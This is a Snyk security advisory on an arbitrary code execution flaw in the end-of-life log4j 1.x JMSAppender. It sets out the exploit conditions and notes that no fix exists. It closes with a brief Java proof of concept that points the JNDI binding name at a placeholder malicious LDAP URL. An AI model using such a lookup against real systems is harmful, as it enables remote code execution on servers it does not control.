Arbitrary Code Execution Affecting log4j:log4j package, versions [0,]


0.0
medium
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    High

  • Privileges Required

    High

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-LOG4J-2316893

  • published

    13 Dec 2021

  • disclosed

    10 Dec 2021

  • credit

    Unknown

How to fix?

There is no fixed version for log4j:log4j.

log4j 1.x is End-of-Life, and a fixed version will not be released. If you believe your application meets the conditions mentioned in the advisory, consider upgrading to the latest log4j 2.x version, or block user input from reaching JMSAppender configurations.

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project.

Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.

In order to leverage this vulnerability the following conditions must be met:

  1. The application has enabled JMSAppender (or a class that extends JMSAppender)
  2. The attacker has access to directly modify the TopicBindingName or TopicConnectionFactoryBindingName configuration variables - which is an unlikely scenario

If these conditions are met, log4j 1.x allows a lookup feature that does not protect against attacker-controlled LDAP and other JNDI related endpoints. Therefore, an attacker with access to the aforementioned configuration variables is able to execute arbitrary code when loaded from an LDAP server.

PoC

import org.apache.log4j.net.JMSAppender;
// ...
JMSAppender a = new JMSAppender();
a.setTopicConnectionFactoryBindingName("ldap://<malicious-url>");
// OR a.setTopicBindingName("ldap://<malicious-url>");
a.activateOptions();